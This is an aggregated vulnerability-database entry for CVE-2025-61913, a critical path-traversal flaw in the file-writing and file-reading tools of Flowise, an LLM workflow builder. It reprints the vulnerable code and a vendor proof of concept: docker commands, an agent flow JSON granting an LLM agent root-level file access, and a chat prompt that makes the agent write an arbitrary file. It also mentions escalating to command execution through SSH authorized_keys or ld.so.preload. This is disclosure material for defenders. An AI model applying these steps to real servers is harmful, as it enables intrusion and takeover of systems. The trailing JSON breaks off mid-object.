cvelistv5 - CVE-2025-61913

CVE-2025-61913 (GCVE-0-2025-61913)

Vulnerability from cvelistv5

Published

2025-10-08 22:43

Modified

2025-10-14 14:18

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Summary

Flowise is a drag & drop user interface to build a customized large language model flow. In versions prior to 3.0.8, WriteFileTool and ReadFileTool in Flowise do not restrict file path access, allowing authenticated attackers to exploit this vulnerability to read and write arbitrary files to any path in the file system, potentially leading to remote command execution. Flowise 3.0.8 fixes this vulnerability.

References

URL

	Vendor	Product	Version
	FlowiseAI	Flowise	Version: < 3.0.8

fkie_cve-2025-61913

Vulnerability from fkie_nvd

Published

2025-10-08 23:15

Modified

2025-10-20 15:23

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3	Patch
security-advisories@github.com	https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8	Release Notes
security-advisories@github.com	https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c	Exploit, Vendor Advisory
security-advisories@github.com	https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	flowiseai	flowise	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EAD12981-C719-4090-884B-9C8F848B80D8",
              "versionEndExcluding": "3.0.8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. In versions prior to 3.0.8, WriteFileTool and ReadFileTool in Flowise do not restrict file path access, allowing authenticated attackers to exploit this vulnerability to read and write arbitrary files to any path in the file system, potentially leading to remote command execution. Flowise 3.0.8 fixes this vulnerability."
    }
  ],
  "id": "CVE-2025-61913",
  "lastModified": "2025-10-20T15:23:05.060",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2025-10-08T23:15:31.357",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

ghsa-jv9m-vf54-chjj

Vulnerability from github

Published

2025-10-09 15:21

Modified

2025-11-15 03:13

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

Flowise is vulnerable to arbitrary file write through its WriteFileTool

Details

Summary

The WriteFileTool in Flowise does not restrict the file path for reading, allowing authenticated attackers to exploit this vulnerability to write arbitrary files to any path in the file system, potentially leading to remote command execution.

Details

Flowise supports providing WriteFileTool for large models, which is used to write files to the server's file system. The implementation of this tool is located at packages/components/nodes/tools/WriteFile/WriteFile.ts.

``` /* * Class for writing data to files on the disk. Extends the StructuredTool * class. / export class WriteFileTool extends StructuredTool { static lc_name() { return 'WriteFileTool' }

schema = z.object({
    file_path: z.string().describe('name of file'),
    text: z.string().describe('text to write to file')
}) as any

name = 'write_file'

description = 'Write file from disk'

store: BaseFileStore

constructor({ store, ...rest }: WriteFileParams) {
    super(rest)

    this.store = store
}

async _call({ file_path, text }: z.infer<typeof this.schema>) {
    await this.store.writeFile(file_path, text)
    return 'File written to successfully.'
}

}

```

This tool directly uses the file_path parameter passed to it without verifying whether the path belongs to Flowise's working directory. Authenticated attackers can exploit this vulnerability to write files with arbitrary content to any path on the server.

There are numerous ways to achieve remote command execution through arbitrary file write vulnerabilities, which will not be elaborated here. For example, attackers could write their own public key to ~/.ssh/authorized_keys to gain remote SSH access, or overwrite /etc/ld.so.preload to hijack dynamic libraries and execute arbitrary code. Flowise's historical vulnerability information (https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-8vvx-qvq9-5948) also describes steps to achieve remote command execution by overwriting the start command in package.json.

PoC

This file writing vulnerability has been verified to exist in the latest Flowise Docker image (https://hub.docker.com/layers/flowiseai/flowise/latest/images/sha256-26300377397818a451e0710389eb77615256b0f3ecc895194850ab35dda3ae7b). The reproduction steps are as follows:

Pull the Flowise Docker image

docker pull flowiseai/flowise

Start the Flowise service

docker run -d --name flowise -p 3000:3000 flowise

Access the Flowise service at server ip:3000 in your browser and register an account
Save the following content as agent.json

{ "nodes": [ { "id": "startAgentflow_0", "type": "agentFlow", "position": { "x": -203, "y": 37 }, "data": { "id": "startAgentflow_0", "label": "Start", "version": 1.1, "name": "startAgentflow", "type": "Start", "color": "#7EE787", "hideInput": true, "baseClasses": [ "Start" ], "category": "Agent Flows", "description": "Starting point of the agentflow", "inputParams": [ { "label": "Input Type", "name": "startInputType", "type": "options", "options": [ { "label": "Chat Input", "name": "chatInput", "description": "Start the conversation with chat input" }, { "label": "Form Input", "name": "formInput", "description": "Start the workflow with form inputs" } ], "default": "chatInput", "id": "startAgentflow_0-input-startInputType-options", "display": true }, { "label": "Form Title", "name": "formTitle", "type": "string", "placeholder": "Please Fill Out The Form", "show": { "startInputType": "formInput" }, "id": "startAgentflow_0-input-formTitle-string", "display": false }, { "label": "Form Description", "name": "formDescription", "type": "string", "placeholder": "Complete all fields below to continue", "show": { "startInputType": "formInput" }, "id": "startAgentflow_0-input-formDescription-string", "display": false }, { "label": "Form Input Types", "name": "formInputTypes", "description": "Specify the type of form input", "type": "array", "show": { "startInputType": "formInput" }, "array": [ { "label": "Type", "name": "type", "type": "options", "options": [ { "label": "String", "name": "string" }, { "label": "Number", "name": "number" }, { "label": "Boolean", "name": "boolean" }, { "label": "Options", "name": "options" } ], "default": "string" }, { "label": "Label", "name": "label", "type": "string", "placeholder": "Label for the input" }, { "label": "Variable Name", "name": "name", "type": "string", "placeholder": "Variable name for the input (must be camel case)", "description": "Variable name must be camel case. For example: firstName, lastName, etc." }, { "label": "Add Options", "name": "addOptions", "type": "array", "show": { "formInputTypes[$index].type": "options" }, "array": [ { "label": "Option", "name": "option", "type": "string" } ] } ], "id": "startAgentflow_0-input-formInputTypes-array", "display": false }, { "label": "Ephemeral Memory", "name": "startEphemeralMemory", "type": "boolean", "description": "Start fresh for every execution without past chat history", "optional": true, "id": "startAgentflow_0-input-startEphemeralMemory-boolean", "display": true }, { "label": "Flow State", "name": "startState", "description": "Runtime state during the execution of the workflow", "type": "array", "optional": true, "array": [ { "label": "Key", "name": "key", "type": "string", "placeholder": "Foo" }, { "label": "Value", "name": "value", "type": "string", "placeholder": "Bar", "optional": true } ], "id": "startAgentflow_0-input-startState-array", "display": true }, { "label": "Persist State", "name": "startPersistState", "type": "boolean", "description": "Persist the state in the same session", "optional": true, "id": "startAgentflow_0-input-startPersistState-boolean", "display": true } ], "inputAnchors": [], "inputs": { "startInputType": "chatInput", "formTitle": "", "formDescription": "", "formInputTypes": "", "startEphemeralMemory": "", "startState": "", "startPersistState": "" }, "outputAnchors": [ { "id": "startAgentflow_0-output-startAgentflow", "label": "Start", "name": "startAgentflow" } ], "outputs": {}, "selected": false }, "width": 103, "height": 66, "selected": false, "positionAbsolute": { "x": -203, "y": 37 }, "dragging": false }, { "id": "directReplyAgentflow_0", "position": { "x": 209, "y": 30.25 }, "data": { "id": "directReplyAgentflow_0", "label": "Direct Reply 0", "version": 1, "name": "directReplyAgentflow", "type": "DirectReply", "color": "#4DDBBB", "hideOutput": true, "baseClasses": [ "DirectReply" ], "category": "Agent Flows", "description": "Directly reply to the user with a message", "inputParams": [ { "label": "Message", "name": "directReplyMessage", "type": "string", "rows": 4, "acceptVariable": true, "id": "directReplyAgentflow_0-input-directReplyMessage-string", "display": true } ], "inputAnchors": [], "inputs": { "directReplyMessage": "", "undefined": "" }, "outputAnchors": [], "outputs": {}, "selected": false }, "type": "agentFlow", "width": 163, "height": 66, "selected": false, "positionAbsolute": { "x": 209, "y": 30.25 }, "dragging": false }, { "id": "agentAgentflow_0", "position": { "x": -63.5, "y": 89.125 }, "data": { "id": "agentAgentflow_0", "label": "Agent 0", "version": 2, "name": "agentAgentflow", "type": "Agent", "color": "#4DD0E1", "baseClasses": [ "Agent" ], "category": "Agent Flows", "description": "Dynamically choose and utilize tools during runtime, enabling multi-step reasoning", "inputParams": [ { "label": "Model", "name": "agentModel", "type": "asyncOptions", "loadMethod": "listModels", "loadConfig": true, "id": "agentAgentflow_0-input-agentModel-asyncOptions", "display": true }, { "label": "Messages", "name": "agentMessages", "type": "array", "optional": true, "acceptVariable": true, "array": [ { "label": "Role", "name": "role", "type": "options", "options": [ { "label": "System", "name": "system" }, { "label": "Assistant", "name": "assistant" }, { "label": "Developer", "name": "developer" }, { "label": "User", "name": "user" } ] }, { "label": "Content", "name": "content", "type": "string", "acceptVariable": true, "generateInstruction": true, "rows": 4 } ], "id": "agentAgentflow_0-input-agentMessages-array", "display": true }, { "label": "OpenAI Built-in Tools", "name": "agentToolsBuiltInOpenAI", "type": "multiOptions", "optional": true, "options": [ { "label": "Web Search", "name": "web_search_preview", "description": "Search the web for the latest information" }, { "label": "Code Interpreter", "name": "code_interpreter", "description": "Write and run Python code in a sandboxed environment" }, { "label": "Image Generation", "name": "image_generation", "description": "Generate images based on a text prompt" } ], "show": { "agentModel": "chatOpenAI" }, "id": "agentAgentflow_0-input-agentToolsBuiltInOpenAI-multiOptions", "display": false }, { "label": "Tools", "name": "agentTools", "type": "array", "optional": true, "array": [ { "label": "Tool", "name": "agentSelectedTool", "type": "asyncOptions", "loadMethod": "listTools", "loadConfig": true }, { "label": "Require Human Input", "name": "agentSelectedToolRequiresHumanInput", "type": "boolean", "optional": true } ], "id": "agentAgentflow_0-input-agentTools-array", "display": true }, { "label": "Knowledge (Document Stores)", "name": "agentKnowledgeDocumentStores", "type": "array", "description": "Give your agent context about different document sources. Document stores must be upserted in advance.", "array": [ { "label": "Document Store", "name": "documentStore", "type": "asyncOptions", "loadMethod": "listStores" }, { "label": "Describe Knowledge", "name": "docStoreDescription", "type": "string", "generateDocStoreDescription": true, "placeholder": "Describe what the knowledge base is about, this is useful for the AI to know when and how to search for correct information", "rows": 4 }, { "label": "Return Source Documents", "name": "returnSourceDocuments", "type": "boolean", "optional": true } ], "optional": true, "id": "agentAgentflow_0-input-agentKnowledgeDocumentStores-array", "display": true }, { "label": "Knowledge (Vector Embeddings)", "name": "agentKnowledgeVSEmbeddings", "type": "array", "description": "Give your agent context about different document sources from existing vector stores and embeddings", "array": [ { "label": "Vector Store", "name": "vectorStore", "type": "asyncOptions", "loadMethod": "listVectorStores", "loadConfig": true }, { "label": "Embedding Model", "name": "embeddingModel", "type": "asyncOptions", "loadMethod": "listEmbeddings", "loadConfig": true }, { "label": "Knowledge Name", "name": "knowledgeName", "type": "string", "placeholder": "A short name for the knowledge base, this is useful for the AI to know when and how to search for correct information" }, { "label": "Describe Knowledge", "name": "knowledgeDescription", "type": "string", "placeholder": "Describe what the knowledge base is about, this is useful for the AI to know when and how to search for correct information", "rows": 4 }, { "label": "Return Source Documents", "name": "returnSourceDocuments", "type": "boolean", "optional": true } ], "optional": true, "id": "agentAgentflow_0-input-agentKnowledgeVSEmbeddings-array", "display": true }, { "label": "Enable Memory", "name": "agentEnableMemory", "type": "boolean", "description": "Enable memory for the conversation thread", "default": true, "optional": true, "id": "agentAgentflow_0-input-agentEnableMemory-boolean", "display": true }, { "label": "Memory Type", "name": "agentMemoryType", "type": "options", "options": [ { "label": "All Messages", "name": "allMessages", "description": "Retrieve all messages from the conversation" }, { "label": "Window Size", "name": "windowSize", "description": "Uses a fixed window size to surface the last N messages" }, { "label": "Conversation Summary", "name": "conversationSummary", "description": "Summarizes the whole conversation" }, { "label": "Conversation Summary Buffer", "name": "conversationSummaryBuffer", "description": "Summarize conversations once token limit is reached. Default to 2000" } ], "optional": true, "default": "allMessages", "show": { "agentEnableMemory": true }, "id": "agentAgentflow_0-input-agentMemoryType-options", "display": false }, { "label": "Window Size", "name": "agentMemoryWindowSize", "type": "number", "default": "20", "description": "Uses a fixed window size to surface the last N messages", "show": { "agentMemoryType": "windowSize" }, "id": "agentAgentflow_0-input-agentMemoryWindowSize-number", "display": false }, { "label": "Max Token Limit", "name": "agentMemoryMaxTokenLimit", "type": "number", "default": "2000", "description": "Summarize conversations once token limit is reached. Default to 2000", "show": { "agentMemoryType": "conversationSummaryBuffer" }, "id": "agentAgentflow_0-input-agentMemoryMaxTokenLimit-number", "display": false }, { "label": "Input Message", "name": "agentUserMessage", "type": "string", "description": "Add an input message as user message at the end of the conversation", "rows": 4, "optional": true, "acceptVariable": true, "show": { "agentEnableMemory": true }, "id": "agentAgentflow_0-input-agentUserMessage-string", "display": false }, { "label": "Return Response As", "name": "agentReturnResponseAs", "type": "options", "options": [ { "label": "User Message", "name": "userMessage" }, { "label": "Assistant Message", "name": "assistantMessage" } ], "default": "userMessage", "id": "agentAgentflow_0-input-agentReturnResponseAs-options", "display": true }, { "label": "Update Flow State", "name": "agentUpdateState", "description": "Update runtime state during the execution of the workflow", "type": "array", "optional": true, "acceptVariable": true, "array": [ { "label": "Key", "name": "key", "type": "asyncOptions", "loadMethod": "listRuntimeStateKeys", "freeSolo": true }, { "label": "Value", "name": "value", "type": "string", "acceptVariable": true, "acceptNodeOutputAsVariable": true } ], "id": "agentAgentflow_0-input-agentUpdateState-array", "display": true } ], "inputAnchors": [], "inputs": { "agentModel": "chatOpenRouter", "agentMessages": [ { "role": "", "content": "<p><span class=\"variable\" data-type=\"mention\" data-id=\"question\" data-label=\"question\">{{ question }}</span> </p>" } ], "agentTools": [ { "agentSelectedTool": "readFile", "agentSelectedToolRequiresHumanInput": "", "agentSelectedToolConfig": { "basePath": "/", "agentSelectedTool": "readFile" } }, { "agentSelectedTool": "writeFile", "agentSelectedToolRequiresHumanInput": "", "agentSelectedToolConfig": { "basePath": "/", "agentSelectedTool": "writeFile" } } ], "agentKnowledgeDocumentStores": "", "agentKnowledgeVSEmbeddings": "", "agentEnableMemory": false, "agentReturnResponseAs": "userMessage", "agentUpdateState": "", "undefined": "", "agentModelConfig": { "cache": "", "modelName": "qwen/qwen3-30b-a3b", "temperature": 0.9, "streaming": true, "maxTokens": "", "topP": "", "frequencyPenalty": "", "presencePenalty": "", "timeout": "", "basepath": "https://openrouter.ai/api/v1", "baseOptions": "", "agentModel": "chatOpenRouter" } }, "outputAnchors": [ { "id": "agentAgentflow_0-output-agentAgentflow", "label": "Agent", "name": "agentAgentflow" } ], "outputs": {}, "selected": false }, "type": "agentFlow", "width": 232, "height": 100, "selected": false, "positionAbsolute": { "x": -63.5, "y": 89.125 }, "dragging": false } ], "edges": [ { "source": "startAgentflow_0", "sourceHandle": "startAgentflow_0-output-startAgentflow", "target": "agentAgentflow_0", "targetHandle": "agentAgentflow_0", "data": { "sourceColor": "#7EE787", "targetColor": "#4DD0E1", "isHumanInput": false }, "type": "agentFlow", "id": "startAgentflow_0-startAgentflow_0-output-startAgentflow-agentAgentflow_0-agentAgentflow_0" }, { "source": "agentAgentflow_0", "sourceHandle": "agentAgentflow_0-output-agentAgentflow", "target": "directReplyAgentflow_0", "targetHandle": "directReplyAgentflow_0", "data": { "sourceColor": "#4DD0E1", "targetColor": "#4DDBBB", "isHumanInput": false }, "type": "agentFlow", "id": "agentAgentflow_0-agentAgentflow_0-output-agentAgentflow-directReplyAgentflow_0-directReplyAgentflow_0" } ] } 5. Click on "AgentFlows" on the left, then click "Add New" on the right to enter the Agent creation page. Click the gear button in the upper right corner, select "Load Agents," choose the agent.json file, and after successful import, you will see three connected nodes. 6. Double-click the middle "Agent 0" node, click "ChatOpenRouter Parameters," then "Connect Credential," and select "Create New." Enter a valid OpenRouter API Key. Alternatively, click "Model" to choose another LLM provider. Once done, click the save button in the upper right corner. 7. After saving, click the purple chat button in the upper right corner and enter: Write "hacked" to /tmp/hacked.txt.
8. After the call is completed, log in to the container via docker exec -it [container id] sh, and you can see that the file has been successfully written.

Impact

Authenticated attackers can exploit this vulnerability to write arbitrary files to any path on the server, ultimately achieving remote command execution.

Credit

This vulnerability was discovered by:

XlabAI Team of Tencent Xuanwu Lab
Atuin Automated Vulnerability Discovery Engine

CVE(s) and credit(s) are preferred.

If you have any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is xlabai@tencent.com.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "flowise-components"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "Flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61913"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-09T15:21:39Z",
    "nvd_published_at": "2025-10-08T23:15:31Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe WriteFileTool in Flowise does not restrict the file path for reading, allowing authenticated attackers to exploit this vulnerability to write arbitrary files to any path in the file system, potentially leading to remote command execution.\n\n### Details\n\nFlowise supports providing WriteFileTool for large models, which is used to write files to the server\u0027s file system. The implementation of this tool is located at packages/components/nodes/tools/WriteFile/WriteFile.ts.\n\n```\n/**\n * Class for writing data to files on the disk. Extends the StructuredTool\n * class.\n */\nexport class WriteFileTool extends StructuredTool {\n    static lc_name() {\n        return \u0027WriteFileTool\u0027\n    }\n\n    schema = z.object({\n        file_path: z.string().describe(\u0027name of file\u0027),\n        text: z.string().describe(\u0027text to write to file\u0027)\n    }) as any\n\n    name = \u0027write_file\u0027\n\n    description = \u0027Write file from disk\u0027\n\n    store: BaseFileStore\n\n    constructor({ store, ...rest }: WriteFileParams) {\n        super(rest)\n\n        this.store = store\n    }\n\n    async _call({ file_path, text }: z.infer\u003ctypeof this.schema\u003e) {\n        await this.store.writeFile(file_path, text)\n        return \u0027File written to successfully.\u0027\n    }\n}\n\n```\n\nThis tool directly uses the file_path parameter passed to it without verifying whether the path belongs to Flowise\u0027s working directory. Authenticated attackers can exploit this vulnerability to write files with arbitrary content to any path on the server.  \n\nThere are numerous ways to achieve remote command execution through arbitrary file write vulnerabilities, which will not be elaborated here. For example, attackers could write their own public key to ~/.ssh/authorized_keys to gain remote SSH access, or overwrite /etc/ld.so.preload to hijack dynamic libraries and execute arbitrary code. Flowise\u0027s historical vulnerability information (https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-8vvx-qvq9-5948) also describes steps to achieve remote command execution by overwriting the start command in package.json.\n\n### PoC\n\nThis file writing vulnerability has been verified to exist in the latest Flowise Docker image (https://hub.docker.com/layers/flowiseai/flowise/latest/images/sha256-26300377397818a451e0710389eb77615256b0f3ecc895194850ab35dda3ae7b). The reproduction steps are as follows:\n\n1. Pull the Flowise Docker image\n\n```\ndocker pull flowiseai/flowise\n```\n\n2. Start the Flowise service\n\n```\ndocker run -d --name flowise -p 3000:3000 flowise\n```\n\n3. Access the Flowise service at server ip:3000 in your browser and register an account\n4. Save the following content as agent.json\n\n```\n{\n  \"nodes\": [\n    {\n      \"id\": \"startAgentflow_0\",\n      \"type\": \"agentFlow\",\n      \"position\": {\n        \"x\": -203,\n        \"y\": 37\n      },\n      \"data\": {\n        \"id\": \"startAgentflow_0\",\n        \"label\": \"Start\",\n        \"version\": 1.1,\n        \"name\": \"startAgentflow\",\n        \"type\": \"Start\",\n        \"color\": \"#7EE787\",\n        \"hideInput\": true,\n        \"baseClasses\": [\n          \"Start\"\n        ],\n        \"category\": \"Agent Flows\",\n        \"description\": \"Starting point of the agentflow\",\n        \"inputParams\": [\n          {\n            \"label\": \"Input Type\",\n            \"name\": \"startInputType\",\n            \"type\": \"options\",\n            \"options\": [\n              {\n                \"label\": \"Chat Input\",\n                \"name\": \"chatInput\",\n                \"description\": \"Start the conversation with chat input\"\n              },\n              {\n                \"label\": \"Form Input\",\n                \"name\": \"formInput\",\n                \"description\": \"Start the workflow with form inputs\"\n              }\n            ],\n            \"default\": \"chatInput\",\n            \"id\": \"startAgentflow_0-input-startInputType-options\",\n            \"display\": true\n          },\n          {\n            \"label\": \"Form Title\",\n            \"name\": \"formTitle\",\n            \"type\": \"string\",\n            \"placeholder\": \"Please Fill Out The Form\",\n            \"show\": {\n              \"startInputType\": \"formInput\"\n            },\n            \"id\": \"startAgentflow_0-input-formTitle-string\",\n            \"display\": false\n          },\n          {\n            \"label\": \"Form Description\",\n            \"name\": \"formDescription\",\n            \"type\": \"string\",\n            \"placeholder\": \"Complete all fields below to continue\",\n            \"show\": {\n              \"startInputType\": \"formInput\"\n            },\n            \"id\": \"startAgentflow_0-input-formDescription-string\",\n            \"display\": false\n          },\n          {\n            \"label\": \"Form Input Types\",\n            \"name\": \"formInputTypes\",\n            \"description\": \"Specify the type of form input\",\n            \"type\": \"array\",\n            \"show\": {\n              \"startInputType\": \"formInput\"\n            },\n            \"array\": [\n              {\n                \"label\": \"Type\",\n                \"name\": \"type\",\n                \"type\": \"options\",\n                \"options\": [\n                  {\n                    \"label\": \"String\",\n                    \"name\": \"string\"\n                  },\n                  {\n                    \"label\": \"Number\",\n                    \"name\": \"number\"\n                  },\n                  {\n                    \"label\": \"Boolean\",\n                    \"name\": \"boolean\"\n                  },\n                  {\n                    \"label\": \"Options\",\n                    \"name\": \"options\"\n                  }\n                ],\n                \"default\": \"string\"\n              },\n              {\n                \"label\": \"Label\",\n                \"name\": \"label\",\n                \"type\": \"string\",\n                \"placeholder\": \"Label for the input\"\n              },\n              {\n                \"label\": \"Variable Name\",\n                \"name\": \"name\",\n                \"type\": \"string\",\n                \"placeholder\": \"Variable name for the input (must be camel case)\",\n                \"description\": \"Variable name must be camel case. For example: firstName, lastName, etc.\"\n              },\n              {\n                \"label\": \"Add Options\",\n                \"name\": \"addOptions\",\n                \"type\": \"array\",\n                \"show\": {\n                  \"formInputTypes[$index].type\": \"options\"\n                },\n                \"array\": [\n                  {\n                    \"label\": \"Option\",\n                    \"name\": \"option\",\n                    \"type\": \"string\"\n                  }\n                ]\n              }\n            ],\n            \"id\": \"startAgentflow_0-input-formInputTypes-array\",\n            \"display\": false\n          },\n          {\n            \"label\": \"Ephemeral Memory\",\n            \"name\": \"startEphemeralMemory\",\n            \"type\": \"boolean\",\n            \"description\": \"Start fresh for every execution without past chat history\",\n            \"optional\": true,\n            \"id\": \"startAgentflow_0-input-startEphemeralMemory-boolean\",\n            \"display\": true\n          },\n          {\n            \"label\": \"Flow State\",\n            \"name\": \"startState\",\n            \"description\": \"Runtime state during the execution of the workflow\",\n            \"type\": \"array\",\n            \"optional\": true,\n            \"array\": [\n              {\n                \"label\": \"Key\",\n                \"name\": \"key\",\n                \"type\": \"string\",\n                \"placeholder\": \"Foo\"\n              },\n              {\n                \"label\": \"Value\",\n                \"name\": \"value\",\n                \"type\": \"string\",\n                \"placeholder\": \"Bar\",\n                \"optional\": true\n              }\n            ],\n            \"id\": \"startAgentflow_0-input-startState-array\",\n            \"display\": true\n          },\n          {\n            \"label\": \"Persist State\",\n            \"name\": \"startPersistState\",\n            \"type\": \"boolean\",\n            \"description\": \"Persist the state in the same session\",\n            \"optional\": true,\n            \"id\": \"startAgentflow_0-input-startPersistState-boolean\",\n            \"display\": true\n          }\n        ],\n        \"inputAnchors\": [],\n        \"inputs\": {\n          \"startInputType\": \"chatInput\",\n          \"formTitle\": \"\",\n          \"formDescription\": \"\",\n          \"formInputTypes\": \"\",\n          \"startEphemeralMemory\": \"\",\n          \"startState\": \"\",\n          \"startPersistState\": \"\"\n        },\n        \"outputAnchors\": [\n          {\n            \"id\": \"startAgentflow_0-output-startAgentflow\",\n            \"label\": \"Start\",\n            \"name\": \"startAgentflow\"\n          }\n        ],\n        \"outputs\": {},\n        \"selected\": false\n      },\n      \"width\": 103,\n      \"height\": 66,\n      \"selected\": false,\n      \"positionAbsolute\": {\n        \"x\": -203,\n        \"y\": 37\n      },\n      \"dragging\": false\n    },\n    {\n      \"id\": \"directReplyAgentflow_0\",\n      \"position\": {\n        \"x\": 209,\n        \"y\": 30.25\n      },\n      \"data\": {\n        \"id\": \"directReplyAgentflow_0\",\n        \"label\": \"Direct Reply 0\",\n        \"version\": 1,\n        \"name\": \"directReplyAgentflow\",\n        \"type\": \"DirectReply\",\n        \"color\": \"#4DDBBB\",\n        \"hideOutput\": true,\n        \"baseClasses\": [\n          \"DirectReply\"\n        ],\n        \"category\": \"Agent Flows\",\n        \"description\": \"Directly reply to the user with a message\",\n        \"inputParams\": [\n          {\n            \"label\": \"Message\",\n            \"name\": \"directReplyMessage\",\n            \"type\": \"string\",\n            \"rows\": 4,\n            \"acceptVariable\": true,\n            \"id\": \"directReplyAgentflow_0-input-directReplyMessage-string\",\n            \"display\": true\n          }\n        ],\n        \"inputAnchors\": [],\n        \"inputs\": {\n          \"directReplyMessage\": \"\",\n          \"undefined\": \"\"\n        },\n        \"outputAnchors\": [],\n        \"outputs\": {},\n        \"selected\": false\n      },\n      \"type\": \"agentFlow\",\n      \"width\": 163,\n      \"height\": 66,\n      \"selected\": false,\n      \"positionAbsolute\": {\n        \"x\": 209,\n        \"y\": 30.25\n      },\n      \"dragging\": false\n    },\n    {\n      \"id\": \"agentAgentflow_0\",\n      \"position\": {\n        \"x\": -63.5,\n        \"y\": 89.125\n      },\n      \"data\": {\n        \"id\": \"agentAgentflow_0\",\n        \"label\": \"Agent 0\",\n        \"version\": 2,\n        \"name\": \"agentAgentflow\",\n        \"type\": \"Agent\",\n        \"color\": \"#4DD0E1\",\n        \"baseClasses\": [\n          \"Agent\"\n        ],\n        \"category\": \"Agent Flows\",\n        \"description\": \"Dynamically choose and utilize tools during runtime, enabling multi-step reasoning\",\n        \"inputParams\": [\n          {\n            \"label\": \"Model\",\n            \"name\": \"agentModel\",\n            \"type\": \"asyncOptions\",\n            \"loadMethod\": \"listModels\",\n            \"loadConfig\": true,\n            \"id\": \"agentAgentflow_0-input-agentModel-asyncOptions\",\n            